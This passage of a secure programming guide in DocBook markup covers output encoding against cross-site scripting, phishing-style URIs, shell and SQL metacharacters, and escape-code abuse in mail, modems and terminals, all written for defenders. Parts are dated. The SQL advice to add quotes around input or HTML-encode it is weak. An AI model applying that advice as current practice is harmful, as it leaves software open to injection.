this isn't a bad idea, but there are many cases where it makes sense to do it
at input instead.
The critical issue is to make sure that you cover all cases for
every output, which is not an easy thing to do regardless of approach.
</para>

<para>
Warning - in many cases these techniques can be subverted unless you've also
gained control over the character encoding of the output.
Otherwise, an attacker could use an ``unexpected'' character encoding
to subvert the techniques discussed here.
Thankfully, this isn't hard;
gaining control over output character encoding is discussed in
<xref linkend="output-character-encoding">.
</para>

<para>
One minor defense, that's often worth doing, is the "HttpOnly" flag for
cookies.
Scripts that run in a web browser cannot access cookie values
that have the HttpOnly flag set (they just get an empty value instead).
This is currently implemented in
Microsoft Internet Explorer, and I expect
Mozilla/Netscape to implement this soon too.
<!-- http://online.securityfocus.com/archive/1/299331/2002-11-09/2002-11-15/0 -->
<!-- http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dncode/html/secure10102002.asp -->
You should set HttpOnly on for any cookie you send, unless you have
scripts that need the cookie, to counter certain kinds of cross-site
scripting (XSS) attacks.
However, the HttpOnly flag can be circumvented in a variety of ways,
so using as your primary defense is inappropriate.
Instead, it's a helpful secondary defense that may help save you in
case your application is written incorrectly.
<!-- See http://www.whitehatsec.com/news.html
  http://www.extremetech.com/article2/0,3973,841047,00.asp
  and the Bugtraq discussion, 23 Jan 2003.
-->
</para>

<para>
The first subsection below discusses how to identify special
characters that need to be filtered, encoded, or validated.
This is followed by subsections describing
how to filter or encode these characters.
There's no subsection discussing how to validate data in general,
however, for input validation in general see <xref linkend="input">,
and if the input is straight HTML text or a URI, see
<xref linkend="filter-html">.
Also note that your web application can receive malicious cross-postings,
so non-queries should forbid the GET protocol
(see <xref linkend="avoid-get-non-queries">).
</para>

<sect3>
<title>Identifying Special Characters</title>
<para>
Here are the special characters for a variety of circumstances
(my thanks to the CERT, who developed this list):

<itemizedlist>
<listitem><para>
In the content of a block-level element (e.g.,
in the middle of a paragraph of text in HTML or a block in XML):
 <itemizedlist>
 <listitem><para>"&lt;" is special because it introduces a tag.</para></listitem>
 <listitem><para>"&amp;" is special because it introduces a character entity.</para></listitem>
 <listitem><para>"&gt;" is special because some browsers treat it as special,
on the assumption that the author of the page really meant
to put in an opening "&lt;", but omitted it in error.</para></listitem>
 </itemizedlist>
</para></listitem>

<listitem><para>
In attribute values:
<itemizedlist>
<listitem><para>In attribute values enclosed with double quotes, the
double quotes are special because they mark the end of the attribute value.
</para></listitem>
<listitem><para>In attribute values enclosed with single quote, the single
quotes are special because they mark the end of the attribute value.
XML's definition allows single quotes, but I've been told that some
XML parsers don't handle them correctly, so you might avoid
using single quotes in XML.
<!--
The CERT advisory at
  http://www.cert.org/tech_tips/malicious_code_mitigation.html
once said they weren't legal; Daniel Naber noted that
this sentence isn't there now:

"Note that these aren't legal in XML, so I would recommend not using these."
-->
</para></listitem>
<listitem><para>Attribute values without any quotes make the white-space
characters such as space and tab special.
Note that these aren't legal in XML either, <emphasis>and</emphasis>
they make more characters special.
Thus, I recommend against unquoted attributes if you're using
dynamically generated values in them.
</para></listitem>
<listitem><para>"&amp;" is special when used in conjunction with
some attributes because it introduces a character entity.
</para></listitem>
</itemizedlist>
</para></listitem>

<listitem><para>
In URLs, for example, a search engine might provide a link within
the results page that the user can click to re-run the search. This
can be implemented by encoding the search query inside the URL. When
this is done, it introduces additional special characters:
<itemizedlist>
<listitem><para>
Space, tab, and new line are special because they mark the
end of the URL.
</para></listitem>
<listitem><para>
        "&amp;" is special because it introduces a character
        entity or separates CGI parameters.
</para></listitem>
<listitem><para>
        Non-ASCII characters (that is, everything above 128 in the
        ISO-8859-1 encoding) aren't allowed in URLs, so they are all
        special here.
</para></listitem>
<listitem><para>
        The "%" must be filtered from input anywhere parameters
        encoded with HTTP escape sequences are decoded by server-side
        code. The percent must be filtered if input such as
        "%68%65%6C%6C%6F" becomes "hello" when it appears on the web
        page in question.
</para></listitem>
</itemizedlist>
</para></listitem>

<listitem><para>
Within the body of a &lt;SCRIPT&gt; &lt;/SCRIPT&gt;
        the semicolon, parenthesis, curly braces, and new line
        should be filtered in situations where text could be inserted
        directly into a preexisting script tag.
</para></listitem>

<listitem><para>
        Server-side scripts that convert any exclamation
        characters (!) in input to double-quote characters (") on
        output might require additional filtering.
</para></listitem>
</itemizedlist>
</para>

<para>
Note that, in general, the ampersand (&amp;) is special in HTML and XML.
</para>

</sect3>

<sect3>
<title>Filtering</title>
<para>
One approach to handling these special characters is simply
eliminating them (usually during input or output).
</para>

<para>
If you're already validating your input for valid characters
(and you generally should), this is easily done by simply omitting the
special characters from the list of valid characters.
Here's an example in Perl of a filter that only accepts legal
characters, and since the filter doesn't accept any special characters
other than the space, it's quite acceptable for use in areas such as
a quoted attribute:
<programlisting>
 # Accept only legal characters:
 $summary =~ tr/A-Za-z0-9\ \.\://dc;
</programlisting>
</para>

<para>
However, if you really want to strip away <emphasis>only</emphasis>
the smallest number of characters, then you could create a subroutine
to remove just those characters:
<programlisting>
 sub remove_special_chars {
  local($s) = @_;
  $s =~ s/[\&lt;\&gt;\"\'\%\;\(\)\&amp;\+]//g;
  return $s;
 }
 # Sample use:
 $data = &amp;remove_special_chars($data);
</programlisting>
</para>
</sect3>

<sect3>
<title>Encoding (Quoting)</title>
<para>
An alternative to removing the special characters is to encode them
so that they don't have any special meaning.
This has several advantages over filtering the characters,
in particular, it prevents data loss.
If the data is "mangled" by the process from the user's point of view,
at least when the data is encoded it's possible to reconstruct the
data that was originally sent.
</para>

<para>
HTML, XML, and SGML all use the ampersand ("&amp;") character as a
way to introduce encodings in the running text; this encoding
is often called ``HTML encoding.''
To encode these characters, simply transform the special characters
in your circumstance. Usually this means
'&lt;' becomes '&amp;lt;',
'&gt;' becomes '&amp;gt;',
'&amp;' becomes '&amp;amp;', and
'&quot;' becomes '&amp;quot;'.
As noted above, although in theory '&gt;' doesn't need to be quoted,
because some browsers act on it (and fill in a '&lt;') it needs to be quoted.
There's a minor complexity with the double-quote character,
because '&amp;quot;' only needs to be
used inside attributes, and some extremely old browsers don't
properly render it.
If you can handle the additional complexity, you can try to encode '&quot;'
only when you need to, but it's easier to simply encode it and ask
users to upgrade their browsers.
Few users will use such ancient browsers, and the double-quote character
encoding has been a standard for a long time.
</para>

<para>
Scripting languages may consider implementing specialized auto-quoting types,
the interesting approach developed in the web application framework
<ulink url="http://www.mems-exchange.org/software/quixote">Quixote</ulink>.
Quixote includes a "template" feature which allows easy mixing of HTML text
and Python code; text generated by a template is passed back to the web browser
as an HTML document.
As of version 0.6, Quixote has two kinds of text (instead of a single
kind as most such languages).
Anything which appears in a literal, quoted string is of type "htmltext,"
and it is assumed to be exactly as the programmer wanted it to be
(this is reasoble, since the programmer wrote it).
Anything which takes the form of an ordinary Python string, however,
is automatically quoted as the template is executed.
As a result, text from a database or other external source is
automatically quoted, and cannot be used for a cross-site scripting attack.
Thus, Quixote implements a safe default -
programmers no longer need to worry about quoting every bit of text
that passes through the application (bugs involving too much quoting
are less likely to be a security problem, and will be obvious in testing).
Quixote uses an open source software license, but because of its
venue identification it is probably GPL-incompatible, and is used by
organizations such as the
<ulink url="http://lwn.net">Linux Weekly News</ulink>.
<!-- See http://lwn.net/Articles/19552/ -->
</para>

<para>
This approach to HTML encoding
isn't quite enough encoding in some circumstances.
As discussed in <xref linkend="output-character-encoding">,
you need to specify the output character encoding (the ``charset'').
<!-- A list of character encodings is at
    ftp://ftp.isi.edu/in-notes/iana/assignments/character-sets; this
    is referenced in the HTML 4.01 spec -->
If some of your data is encoded using a different character encoding
than the output character encoding, then you'll need to do something so your
output uses a consistent and correct encoding.
Also, you've selected an output encoding other than
ISO-8859-1, then you need to
make sure that any alternative encodings for special characters
(such as "&lt;") can't slip through to the browser.
This is a problem with several character encodings, including popular ones
like UTF-7 and UTF-8; see <xref linkend="character-encoding">
for more information on how to prevent ``alternative'' encodings of characters.
<!-- Is it possible to slip through even with ISO-8859-1? I don't see
     a way to do it, so I'm not raising that concern. -->
One way to deal with incompatible character encodings is to
first translate the characters internally to ISO 10646 (which has
the same character values as Unicode), and then
using either numeric character references or character entity
references to represent them:
<itemizedlist>
<listitem><para>A numeric character reference looks like
"&amp;#D;", where D is a decimal number, or
"&amp;#xH;" or "&amp;#XH;", where H is a hexadecimal number.
The number given is the ISO 10646 character id (which has the same character
values as Unicode).
Thus &amp;#1048; is the Cyrillic capital letter "I".
The hexadecimal system isn't supported in the SGML standard (ISO 8879),
so I'd suggest using the decimal system for output.
Also, although SGML specification
permits the trailing semicolon to be omitted in
some circumstances, in practice many systems don't handle it - so
always include the trailing semicolon.
</para></listitem>
<listitem><para>A character entity reference does the same thing but
uses mnemonic names instead of numbers.
For example, "&amp;lt;" represents the &lt; sign.
If you're generating HTML, see the
<ulink url="http://www.w3.org">HTML specification</ulink> which
lists all mnemonic names.
</para></listitem>
</itemizedlist>
Either system (numeric or character entity)
works; I suggest using character entity references for
'&lt;', '&gt;', '&amp;', and '&quot;' because it makes your code (and output)
easier for humans to understand.  Other than that, it's not clear
that one or the other system is uniformly better.
If you expect humans to edit the output by hand later, use the
character entity references where you can, otherwise I'd use the
decimal numeric character references just because they're easier to program.
This encoding scheme can be quite inefficient for some languages
(especially Asian languages); if that is your primary content, you
might choose to use a different character encoding (charset), filter
on the critical characters (e.g., "&lt;")
and ensure that no alternative encodings for critical characters are allowed.
</para>

<para>
URIs have their own encoding scheme, commonly called ``URL encoding.''
In this system, characters not permitted in URLs are represented using
a percent sign followed by its two-digit hexadecimal value.
To handle all of ISO 10646 (Unicode), it's recommended to first translate
the codes to UTF-8, and then encode it.
See <xref linkend="Validating-uris"> for more about validating URIs.
</para>


</sect3>

</sect2>

</sect1>

<sect1 id="semantic-attacks">
<title>Foil Semantic Attacks</title>

<para>
A ``semantic attack'' is an attack in which the attacker uses the
computing infrastructure/system in a way that fools the victim into
thinking they are doing something, but are doing something different,
yet the computing infrastructure/system is working exactly as it was
designed to do.
Semantic attacks often involve financial scams, where the attacker is
trying to fool the victim into giving the attacker large sums of money
(e.g., thinking they're investing in something).
For example, the attacker may try to convince the user that they're
looking at a trusted website, even if they aren't.
</para>

<para>
Semantic attacks are difficult to counter, because they're exploiting
the correct operation of the computer.
The way to deal with semantic attacks is to help give the human
additional information, so that when ``odd'' things happen the human
will have more information or a warning will be presented
that something may not be what it appears to be.
</para>

<para>
One example is URIs that, while legitimate, may fool users into
thinking they have a different meaning.
For example, look at this URI:
<programlisting>
  http://www.bloomberg.com@www.badguy.com
</programlisting>
If a user clicked on that URI, they might think that they're going
to Bloomberg (who provide financial commodities news), but instead
they're going to www.badguy.com (and providing the username
www.bloomberg.com, which www.badguy.com will conveniently ignore).
If the badguy.com website then imitated the bloomberg.com site,
a user might be convinced that they're seeing the real thing
(and make investment decisions based on attacker-controlled
information).
This depends on URIs being used in an unusual way - clickable URIs
can have usernames, but usually don't.
One solution for this case is for the web browser to detect such unusual
URIs and create a pop-up confirmation widget, saying
``You are about to log into www.badguy.com as user www.bloomberg.com;
do you wish to proceed?''
If the widget allows the user to change these entries, it provides
additional functionality to the user as well as providing protection
against that attack.
</para>

<para>
Another example is homographs, particularly international homographs.
Certain letters look similar to each other, and these can be exploited
as well.
For example, since 0 (zero) and O (the letter O) look similar to each
other, users may not realize that WWW.BLOOMBERG.COM and WWW.BL00MBERG.COM
are different web addresses.
Other similar-looking letters include 1 (one) and l (lower-case L).
If international characters are allowed, the situation is worse.
For example, many Cyrillic letters look essentially the same as
Roman letters, but the computer will treat them differently.
Currently most systems don't allow international characters in host names,
but for various good reasons it's widely agreed that support for them
will be necessary in the future.
One proposed solution has been to diplay letters from different code regions
using different colors - that way,
users get more information visually.
If the users look at URI, they will hopefully notice the strange coloring.
[Gabrilovich 2002]
However, this does show the essence of a semantic attack -
it's difficult to defend against, precisely because the computers are
working correctly.
</para>
</sect1>

<sect1 id="careful-typing">
<title>Be Careful with Data Types</title>

<para>
Be careful with the data types used, in particular those used in
interfaces.
For example, ``signed'' and ``unsigned'' values are treated differently
in many languages (such as C or C++).
<!-- This was the basis of a sysctl() vulnerability -->
</para>
</sect1>

</chapter>

<chapter id="call-out">
<title>Carefully Call Out to Other Resources</title>

<epigraph>
<attribution>Psalms 146:3 (NIV)</attribution>
<para>
Do not put your trust in princes, in mortal men, who cannot save.
</para>
</epigraph>

<para>
Practically no program is truly self-contained; nearly all programs
call out to other programs for resources, such as programs provided
by the operating system, software libraries, and so on.
Sometimes this calling out to other resources isn't obvious or involves
a great deal of ``hidden'' infrastructure which must be depended on,
e.g., the mechanisms to implement dynamic libraries.
Clearly, you must be careful about what other resources your program trusts
and you must make sure that the way you send requests to them.
</para>

<sect1 id="call-only-safe">
<title>Call Only Safe Library Routines</title>

<para>
Sometimes there is a conflict between security and the development
principles of abstraction (information hiding) and reuse.
The problem is that some high-level library routines
may or may not be implemented securely,
and their specifications won't tell you.
Even if a particular implementation is secure, it may not be
possible to ensure that other versions of the routine
will be safe, or that the same interface will be safe on other platforms.
<!-- I once said:
 For example, I've not been able to assure myself that tmpfile(3) is
 secure on all platforms (see (xref linkend="temporary-files"));
 its specifications aren't sufficiently clear to give me confidence of this.

 However, I've since learned that my fears were justified.
 System V (at least up through 1993) _did_not_ do this safely. -->

</para>

<para>
In the end, if your application must be secure, you must sometimes
re-implement your own versions of library routines.
Basically, you have to re-implement routines if you can't be sure
that the library routines will perform the necessary actions you require
for security.
Yes, in some cases the library's implementation should be fixed, but
it's your users who will be hurt if you choose a library routine that
is a security weakness.
If can, try to use the high-level interfaces when you must
re-implement something - that way, you can switch to the high-level
interface on systems where its use is secure.
</para>

<para>
If you can, test to see if the routine is secure or not, and use it if
it's secure - ideally you can perform this test as part of
compilation or installation (e.g., as part of an ``autoconf'' script).
For some conditions this kind of run-time testing is impractical, but
for other conditions, this can eliminate many problems.
If you don't want to bother to re-implement the library, at least test
to make sure it's safe and halt installation if it isn't.
That way, users will not accidentally install an insecure program and
will know what the problem is.
</para>
</sect1>

<sect1 id="limit-call-outs">
<title>Limit Call-outs to Valid Values</title>

<para>
Ensure that any call out to another program only permits valid
and expected values for every parameter.
This is more difficult than it sounds, because many
library calls or commands call lower-level routines in potentially
surprising ways.
For example, many system calls are implemented indirectly by
calling the shell, which means that passing characters which are shell
metacharacters can have dangerous effects.
So, let's discuss metacharacters.
</para>
</sect1>

<sect1 id="handle-metacharacters">
<title>Handle Metacharacters</title>

<para>
Many systems, such as the command line shell and SQL interpreters,
have ``metacharacters'', that is, characters in their input
that are not interpreted as data.
Such characters might commands, or delimit data from commands or other data.
If there's a language specification for that system's interface
that you're using, then it certainly has metacharacters.
If your program invokes those other systems and allows attackers to
insert such metacharacters, the usual result is that an attacker can
completely control your program.
</para>

<para>
One of the most pervasive metacharacter problems are those involving
shell metacharacters.
The standard Unix-like command shell (stored in /bin/sh)
interprets a number of characters specially.
If these characters are sent to the shell, then their special interpretation
will be used unless escaped; this fact can be used to break programs.
According to the WWW Security FAQ [Stein 1999, Q37], these metacharacters are:

<screen width="61">
&amp; ; ` ' \ " | * ? ~ &#60; &#62; ^ ( ) [ ] { } $ \n \r
</screen>
</para>

<para>
I should note that in many situations you'll also want to escape
the tab and space characters, since they (and the newline) are the default
parameter separators.
The separator values can be changed by setting the IFS environment
variable, but if you can't trust the source of this variable you should
have thrown it out or reset it anyway as part of your environment
variable processing.
</para>

<para>
Unfortunately, in real life this isn't a complete list.
Here are some other characters that can be problematic:
<!-- Martin Douda provided this list of ! through *; I added the note
     about control characters -->
<itemizedlist>
<listitem><para>
'!' means ``not'' in an expression (as it does in C);
    if the return value of a program is tested, prepending !
    could fool a script into thinking something had failed when it
    succeeded or vice versa.
    In some shells, the "!" also accesses the command history, which can
    cause real problems.
    In bash, this only occurs for interactive mode, but tcsh
    (a csh clone found in some Linux distributions) uses "!" even in scripts.
</para></listitem>

<listitem><para>
'#' is the comment character; all further text on the line is ignored.
</para></listitem>

<listitem><para>
'-' can be misinterpreted as leading an option (or, as -&nbsp;-, disabling
all further options).  Even if it's in the ``middle'' of a filename,
if it's preceded by what the shell considers as whitespace you may
have a problem.
</para></listitem>

<listitem><para>
' ' (space), '\t' (tab), '\n' (newline), '\r' (return),
'\v' (vertical space), '\f' (form feed),
and other whitespace characters can have many dangerous effects.
They can may turn a ``single'' filename into multiple arguments, for example,
or turn a single parameter into multiple parameter when stored.
Newline and return have a number of additional dangers, for example,
they can be used to create ``spoofed'' log entries in some programs,
or inserted just before a separate command that is then executed
(if an underlying protocol uses newlines or returns as command
separators).
<!--
More details at this Bugtraq posting:
Subject: CRLF Injection
From: Ulf Harnhammar <ulfh@update.uu.se>
Date: Tue, 7 May 2002 00:12:10 +0200 (CEST)
To: bugtraq@securityfocus.com
-->
</para></listitem>

<listitem><para>
Other control characters (in particular, NIL) may cause problems for
some shell implementations.
</para></listitem>

<listitem><para>
Depending on your usage, it's even conceivable that ``.''
(the ``run in current shell'') and ``='' (for setting variables) might
be worrisome characters.
However, any example I've found so far where these
are issues have other (much worse) security problems.
</para></listitem>

<!--
  '.' run in current shell - also could be harmful alloving to modify
    execution environment

  '=' for variables, again modifying execution environment

  (*) depending on programs called from script any other character can cause
  problems.
-->
</itemizedlist>

</para>


<para>
What makes the shell metacharacters particularly pervasive is
that several important library calls, such as popen(3) and system(3),
are implemented by calling the command shell, meaning that they will
be affected by shell metacharacters too.
Similarly, execlp(3) and execvp(3) may cause the shell to be called.
Many guidelines suggest avoiding popen(3), system(3), execlp(3), and execvp(3)
entirely and use execve(3) directly in C when trying to spawn
a process [Galvin 1998b].
At the least, avoid using system(3) when you can use the execve(3);
since system(3) uses the shell to expand characters, there is more
opportunity for mischief in system(3).
In a similar manner the Perl and shell backtick (`) also call a command shell;
for more information on Perl see <xref linkend="perl">.
</para>

<para>
Since SQL also has metacharacters, a similar issue revolves around
calls to SQL.
When metacharacters are provided as input to trigger SQL metacharacters,
it's often called "SQL injection".
See
<ulink url="http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf">
SPI Dynamic's paper ``SQL Injection: Are your Web Applications Vulnerable?''
</ulink>
for further discussion on this.
As discussed in <xref linkend="input">,
define a very limited pattern and only allow data matching that
pattern to enter; if you limit your pattern to ^[0-9]$ or
^[0-9A-Za-z]*$ then you won't have a problem.
If you must handle data that may include SQL metacharacters, a good approach
is to convert it (as early as possible) to some other encoding before
storage, e.g.,
HTML encoding (in which case you'll need to encode any ampersand characters
too).
Also, prepend and append a quote to all user input, even
if the data is numeric; that way, insertions of white space and other
kinds of data won't be as dangerous.
</para>

<para>
Forgetting one of these characters can be disastrous, for example,
many programs omit backslash as a shell metacharacter [rfp 1999].
As discussed in the <xref linkend="input">, a recommended approach
by some
is to immediately escape at least all of these characters when they are input.
But again, by far and away the best approach is to identify which
characters you wish to permit, and use a filter to only permit
those characters.
</para>

<para>
A number of programs, especially those designed for human interaction,
have ``escape'' codes that perform ``extra'' activities.
One of the more common (and dangerous) escape codes is one that brings
up a command line.
Make sure that these ``escape'' commands can't be included
(unless you're sure that the specific command is safe).
For example, many line-oriented mail programs (such as mail or mailx) use
tilde (~) as an escape character, which can then be used to send a number
of commands.
As a result, apparently-innocent commands such as
``mail admin < file-from-user'' can be used to execute arbitrary programs.
Interactive programs such as vi, emacs, and ed have ``escape'' mechanisms
that allow users to run arbitrary shell commands from their session.
Always examine the documentation of programs you call to search for
escape mechanisms.
It's best if you call only programs intended for use by other programs; see
<xref linkend="call-intentional-apis">.
</para>

<para>
The issue of avoiding
escape codes even goes down to low-level hardware components
and emulators of them.
Most modems implement the so-called ``Hayes'' command set.
Unless the command set is disabled, inducing
a delay, the phrase ``+++'', and then another delay forces the modem
to interpret any following text as commands to the modem instead.
This can be used to implement denial-of-service attacks (by
sending ``ATH0'', a hang-up command) or even forcing
a user to connect to someone else (a sophisticated attacker could
re-route a user's connection through a machine under the attacker's control).
For the specific case of modems, this is easy to counter
(e.g., add "ATS2-255" in the modem initialization string), but the
general issue still holds: if you're controlling a lower-level component,
or an emulation of one, make sure that you disable or otherwise handle
any escape codes built into them.
</para>

<para>
Many ``terminal'' interfaces implement the escape
codes of ancient, long-gone physical terminals like the VT100.
These codes can be useful, for example, for bolding characters,
changing font color, or moving to a particular location
in a terminal interface.
However, do not allow arbitrary untrusted data to be sent directly
to a terminal screen, because some of those codes can cause serious problems.
On some systems you can remap keys (e.g., so when a user presses
"Enter" or a function key it sends the command you want them to run).
On some you can even send codes to
clear the screen, display a set of commands you'd like the victim to run,
and then send that set ``back'', forcing the victim to run
the commands of the attacker's choosing without even waiting for a keystroke.
This is typically implemented using ``page-mode buffering''.
This security problem is why emulated tty's (represented as device files,
usually in /dev/) should only be writeable by
their owners and never anyone else - they should never have
``other write'' permission set, and unless only the user is a member of
the group (i.e., the ``user-private group'' scheme), the ``group write''
permission should not be set either for the terminal [Filipski 1986].
If you're displaying data to the user at a (simulated) terminal, you probably
need to filter out all control characters (characters with values less
than 32) from data sent back to
the user unless they're identified by you as safe.
Worse comes to worse, you can identify tab and newline (and maybe
carriage return) as safe, removing all the rest.
Characters with their high bits set (i.e., values greater than 127)
are in some ways trickier to handle; some old systems implement them as
if they weren't set, but simply filtering them inhibits much international
use.
In this case, you need to look at the specifics of your situation.
</para>

<para>
A related problem is that the NIL character (character 0) can have
surprising effects.
Most C and C++ functions assume
that this character marks the end of a string, but string-handling routines
in other languages (such as Perl and Ada95) can handle strings containing NIL.
Since many libraries and kernel calls use the C convention, the result
is that what is checked is not what is actually used [rfp 1999].
</para>

<para>
When calling another program or referring to a file
always specify its full path (e.g, <filename>/usr/bin/sort</filename>).
<!-- I believe a Corel vulnerability is based on "sort" not being listed
     as /usr/bin/sort -->
For program calls,
this will eliminate possible errors in calling the ``wrong'' command,
even if the PATH value is incorrectly set.
For other file referents, this reduces problems from ``bad'' starting
directories.
</para>

</sect1>

<sect1 id="call-intentional-apis">
<title>Call Only Interfaces Intended for Programmers</title>

<para>
Call only application programming interfaces (APIs) that are
intended for use by programs.
Usually a program can invoke any other program,
including those that are really designed for human interaction.
However, it's usually unwise to invoke a program intended for human
interaction in the same way a human would.
The problem is that programs's human interfaces are intentionally rich
in functionality and are often difficult to completely control.
As discussed in <xref linkend="handle-metacharacters">,
interactive programs often have ``escape'' codes,
which might enable an attacker to perform undesirable functions.
Also, interactive programs often try to intuit the ``most likely'' defaults;
this may not be the default you were expecting, and an attacker may find
a way to exploit this.
</para>

<para>
Examples of programs you shouldn't normally call directly include
mail, mailx, ed, vi, and emacs.
At the very least, don't call these without checking
their input first.
</para>

<para>
Usually there are parameters to give you safer access to the program's
functionality,
or a different API or application that's intended for use by programs;
use those instead.
For example, instead of invoking a text editor to edit some text
(such as ed, vi, or emacs), use sed where you can.
</para>
</sect1>


<sect1 id="check-returns">
<title>Check All System Call Returns</title>

<para>
Every system call that can return an error condition must have that
error condition checked.
One reason is that nearly all system calls require limited system resources,
and users can often affect resources in a variety of ways.
Setuid/setgid programs can have limits set on them through calls such as
setrlimit(3) and nice(2).
External users of server programs and CGI scripts
may be able to cause resource exhaustion simply by making a large number
of simultaneous requests.
If the error cannot be handled gracefully, then fail safe as discussed earlier.
</para>

</sect1>

<sect1 id="avoid-vfork">
<title>Avoid Using vfork(2)</title>

<para>
The portable way to create new processes in Unix-like systems
is to use the fork(2) call.
BSD introduced a variant called vfork(2) as an optimization technique.
In vfork(2), unlike fork(2),  the child borrows the parent's memory
and thread of control until a call to execve(2V) or an exit occurs;
the parent process is suspended while the child is using its resources.
The rationale is that in old BSD systems, fork(2) would actually cause
memory to be copied while vfork(2) would not.
Linux never had this problem; because Linux used copy-on-write
semantics internally, Linux only copies pages when they changed
(actually, there are still some tables that have to be copied; in most
circumstances their overhead is not significant).
Nevertheless, since some programs depend on vfork(2),
recently Linux implemented the BSD vfork(2) semantics
(previously vfork(2) had been an alias for fork(2)).
</para>

<para>
There are a number of problems with vfork(2).
From a portability point-of-view,
the problem with vfork(2) is that it's actually fairly tricky for a
process to not interfere with its parent, especially in high-level languages.
The ``not interfering'' requirement applies to the actual machine code
generated, and many compilers generate hidden temporaries and other
code structures that cause unintended interference.
The result: programs using vfork(2) can easily fail when the code changes
or even when compiler versions change.
</para>

<para>
For secure programs it gets worse on Linux systems, because
Linux (at least 2.2 versions through 2.2.17) is vulnerable to a
race condition in vfork()'s implementation.
If a privileged process uses a vfork(2)/execve(2) pair in Linux
to execute user commands, there's a race condition
while the child process is already running as the user's
UID, but hasn`t entered execve(2) yet.
The user may be able to send signals, including SIGSTOP, to this process.
Due to the semantics of
vfork(2), the privileged parent process would then be blocked as well.
As a result, an unprivileged process could cause the privileged process
to halt, resulting in a denial-of-service of the privileged process' service.
FreeBSD and OpenBSD, at least, have code to specifically deal with this
case, so to my knowledge they are not vulnerable to this problem.
My thanks to Solar Designer, who noted and documented this
problem in Linux on the ``security-audit'' mailing list on October 7, 2000.
<!--
http://www.geocrawler.com/search/?config=302&words=Designer+vfork
http://www.geocrawler.com/archives/3/302/2000/10/0/4460856/
-->
</para>

<para>
The bottom line with vfork(2) is simple:
<emphasis remap="it">don't</emphasis> use vfork(2) in your programs.
This shouldn't be difficult; the primary use of vfork(2) is to support old
programs that needed vfork's semantics.
</para>
</sect1>

<sect1 id="embedded-content-bugs">
<title>Counter Web Bugs When Retrieving Embedded Content</title>
<para>
Some data formats can embed references to content that is automatically
retrieved when the data is viewed (not waiting for a user to select it).
If it's possible to cause this data to be retrieved through the
Internet (e.g., through the World Wide Web), then there is a
potential to use this capability to obtain information about readers
without the readers' knowledge, and in some cases to force the reader
to perform activities without the reader's consent.
This privacy concern is sometimes called a ``web bug.''
</para>

<para>
In a web bug, a reference is intentionally inserted into a document
and used by the content author to track
who, where, and how often a document is read.
The author can also essentially watch how a ``bugged'' document
is passed from one person to another or from one organization to another.
</para>

<para>
The HTML format has had this issue for some time.
According to the
<ulink url="http://www.privacyfoundation.org">Privacy Foundation</ulink>:
<blockquote>
<para>
Web bugs are used extensively today by Internet
advertising companies on Web pages and
in HTML-based email messages for tracking.
They are typically 1-by-1 pixel in size to make them
invisible on the screen to disguise the fact that they are used for tracking.
However, they could be any image (using the img tag);
other HTML tags that can implement web bugs, e.g., frames,
form invocations, and scripts.
By itself, invoking the web bug will provide the ``bugging'' site the
reader IP address, the page that the reader visited, and various information
about the browser; by also using cookies it's often possible to determine
the specific identify of the reader.
A survey about web bugs is available at
<ulink url="http://www.securityspace.com/s_survey/data/man.200102/webbug.html">http://www.securityspace.com/s_survey/data/man.200102/webbug.html</ulink>.
</para>
</blockquote>
</para>

<para>
What is more concerning is that other document formats seem to have
such a capability, too.
When viewing HTML from a web site with a web browser, there are other
ways of getting information on who is browsing the data, but when
viewing a document in another format from an email few users expect
that the mere act of reading the document can be monitored.
However, for many formats, reading a document can be monitored.
For example, it has been recently determined that Microsoft Word can
support web bugs;
see
<ulink url="http://www.privacyfoundation.org/advisories/advWordBugs.html">
the Privacy Foundation advisory for more information </ulink>.
As noted in their advisory,
recent versions of Microsoft Excel and Microsoft Power Point can also
be bugged.
In some cases, cookies can be used to obtain even more information.
</para>

<para>
Web bugs are primarily an issue with the design of the file format.
If your users value their privacy, you probably will want to limit the
automatic downloading of included files.
One exception might be when the file itself is being downloaded
(say, via a web browser); downloading other files from the same location
at the same time is much less likely to concern users.
</para>

</sect1>

<sect1 id="hide-sensitive-information">
<title>Hide Sensitive Information</title>
<para>
Sensitive information should be hidden from prying eyes, both while
being input and output, and when stored in the system.
Sensitive information certainly includes credit card numbers,
account balances, and home addresses, and in many applications
also includes names, email addressees, and other private information.
</para>

<para>
Web-based applications should encrypt all communication with a user
that includes sensitive information; the usual way is to use the
"https:" protocol (HTTP on top of SSL or TLS).
According to the HTTP 1.1 specification (IETF RFC 2616 section 15.1.3),
authors of services which use the HTTP protocol <emphasis>should not</emphasis>
use GET based forms for the submission of sensitive data,
because this will cause this data to be encoded in the Request-URI.
Many existing servers, proxies, and user agents will log
the request URI in some place where it might be visible to third parties.
Instead, use POST-based submissions, which are intended for
this purpose.
</para>

<para>
Databases of such sensitive data should also be encrypted on any storage
device (such as files on a disk).
Such encryption doesn't protect against an attacker breaking the secure
application, of course, since obviously the application
has to have a way to access the encrypted data too.
However, it <emphasis>does</emphasis> provide some defense against
attackers who manage to get backup disks of the data
but not of the keys used to decrypt them.
It also provides some defense if an attacker doesn't manage to break
into an application, but does manage to partially break into a related
system just enough to view the stored data - again, they now have to
break the encryption algorithm to get the data.
There are many circumstances where data can be transferred unintentionally
(e.g., core files), which this also prevents.
It's worth noting, however, that this is not as strong a defense as you'd
think, because often the server itself can be subverted or broken.
</para>
</sect1>
</chapter>

<chapter id="output">
<title>Send Information Back Judiciously</title>

<epigraph>
<attribution>Proverbs 26:4 (NIV)</attribution>
<para>
Do not answer a fool according to his folly,
or you will be like him yourself.
</para>
</epigraph>

<sect1 id="minimize-feedback">
<title>Minimize Feedback</title>

<para>
Avoid giving much information to untrusted users; simply succeed or fail,
and if it fails just say it failed and minimize information on why it failed.
Save the detailed information for audit trail logs.
For example:

<itemizedlist>
<listitem>

<para>
If your program requires some sort of user authentication
(e.g., you're writing a network service or login program),
give the user as little information as possible before they authenticate.
In particular, avoid giving away the version number of your program
before authentication.
Otherwise,
if a particular version of your program is found to have a vulnerability,
then users who don't upgrade from that version advertise to attackers that
they are vulnerable.
</para>
</listitem>
<listitem>

<para>
If your program accepts a password, don't echo it back;
this creates another way passwords can be seen.
</para>
</listitem>

</itemizedlist>

</para>
</sect1>

<sect1 id="no-comments">
<title>Don't Include Comments</title>

<para>
When returning information, don't include any ``comments'' unless you're
sure you want the receiving user to be able to view them.
This is a particular problem for web applications that generate files
(such as HTML).
Often web application programmers wish to comment their work
(which is fine), but instead of simply leaving the comment in their code,
the comment is included as part of the generated file (usually HTML or XML)
